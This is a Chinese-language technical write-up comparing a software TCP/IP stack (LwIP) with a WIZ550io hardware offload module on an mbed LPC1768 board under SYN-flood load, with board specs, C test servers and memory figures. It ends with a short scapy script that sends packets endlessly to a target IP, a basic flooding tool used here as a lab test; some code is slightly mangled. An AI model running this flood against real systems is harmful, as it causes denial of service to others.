– 我們將比較傳統的方法,並在DoS攻擊(Syn-flood 攻擊)所提出的方法。
物聯網平台:mbed LPC1768 NXP

它是基於恩智浦LPC1768,具有在96MHz的32位ARM Cortex-M3內核上運行。 它包括512KB的FLASH,32KB的RAM和大量的接口,包括內置的以太網 ,USB主機和設備,CAN,SPI,I2C,ADC,DAC,PWM等I / O接口。 上述引出線表示常用的接口和它們的位置。 請注意,所有的數字的針(P5-P30)也可以用作DigitalIn和DigitalOut接口。
-鏈接1: 欲了解更多詳情
傳統方法:LwIP的(TCP / IP軟件堆棧)+以太網MAC(LPC1768)+以太網PHY(DP83848J)@mbed應用電路板(以太網連接)

* 128×32圖形LCD
* 5向搖桿
* 2×電位
* 3.5mm音頻插孔(模擬輸出)
* 3軸/ 11.5克加速度
* 3.5mm音頻插孔(模擬輸入)
* 2個伺服電機頭
* USB迷你-B連接器
* RJ45以太網連接器
* USB-A接口
鏈接2: mbed應用板在mbed.org
建議方法:WIZ550io(TOE +以太網MAC + PHY以太網)

-鏈接3: WIZ550io 組件在 mbed.org
-鏈接4: W5500 組件在 mbed.org
應用程序 iperf
#include "mbed.h" #include "EthernetInterface.h" EthernetInterface eth; int main() { printf("Trying rn"); // as your env. change to real IP address and so on. int ret = eth.init("", "", ""); if (!ret) { printf("Initialized, MAC: %snr", eth.getMACAddress()); printf("Connected, IP: %s, MASK: %s, GW: %snr", eth.getIPAddress(), eth.getNetworkMask(), eth.getGateway()); } else { printf("Error eth.init() - ret = %dnr", ret); return -1; } eth.connect(); printf("IP Address is %sn", eth.getIPAddress()); TCPSocketServer server; server.bind(5000); server.listen(); while (true) { printf("nWait for new connection...n"); TCPSocketConnection client; server.accept(client); client.set_blocking(false, 1500); // Timeout after (1.5)s printf("Connection from: %sn", client.get_address()); char buffer[2048]; while (true) { int n = client.receive(buffer, sizeof(buffer)); if (n < 0) break; // !_is_connected } client.close(); } }
#include <stdio.h> #include <string.h> #include "mbed.h" #include "EthernetInterface.h" //DigitalOut myled(LED1); //Serial pc(USBTX , USBRX); int main() { printf("Test - WIZ550iorn"); /** Set the spi bus clock frequency * * @param hz SCLK frequency in hz (default = 1MHz) * Maximum SPI data bit rate of 12.5 Mbit/s in LPC176X */ spi.frequency(12500000); SPI spi(p5, p6, p7); // mosi, miso, sclk EthernetInterface eth(&spi, p8, p11); // spi, cs, reset // as your env. change to real IP address and so on. int ret = eth.init("", "", ""); if (!ret) { printf("Initialized, MAC: %snr", eth.getMACAddress()); printf("Connected, IP: %s, MASK: %s, GW: %snr", eth.getIPAddress(), eth.getNetworkMask(), eth.getGateway()); } else { printf("Error eth.init() - ret = %dnr", ret); return -1; } printf("IP Address is %sn", eth.getIPAddress()); TCPSocketServer server; server.bind(5000); server.listen(); while (true) { printf("nWait for new connection...n"); TCPSocketConnection client; server.accept(client); client.set_blocking(false, 1500); // Timeout after (1.5)s printf("Connection from: %sn", client.get_address()); char buffer[2048]; while (true) { int n = client.receive(buffer, sizeof(buffer)); if (n < 0) break; // !_is_connected } client.close(); } }

Memory usage

35.2kB(110%) : LPC1768有3 RAM庫:一個通用32kB的之一,和兩個aditional的那些16kB的每個以太網/ USB/ CAN的目的。以太網完全填滿這些額外的銀行之一。在線編譯器考慮到這一點總RAM的用法,但假設只有32kB的是可用的,所以它得到了100%的是什麼顯示,仍然會正常工作,但。 (來自mbed.org: developer.mbed.org)
** TOE能減少閃光燈和RAM分別的使用了7%和119%。 **
from scapy.all import inter = input('inter(time in seconds to wait between 2packets) :') def synFlood(src, tgt, inter): IPlayer = IP(src, dst=tgt) TCPlayer= TCP(sport=3000, dport=3000) # as your env. change source and destination port pkt = IPlayer / TCPlayer send(pkt, loop=1, inter=inter) # #send(pkts, inter=0, loop=0, verbose=None) # Send packets at layer 3, using the conf.L3socket supersocket. pkts can # be a packet, an implicit packet or a list of them. # # loop: send the packets endlessly if not 0. # inter: time in seconds to wait between 2 packets # verbose: override the level of verbosity. Make the function totally silent when 0. # * Refer to http://www.secdev.org/projects/scapy/files/scapydoc.pdf for more detail. # as your env. change to real IP address and so on. src = "" # PC IP address tgt = "" # target board (LPC1768) synFlood(src, tgt, inter)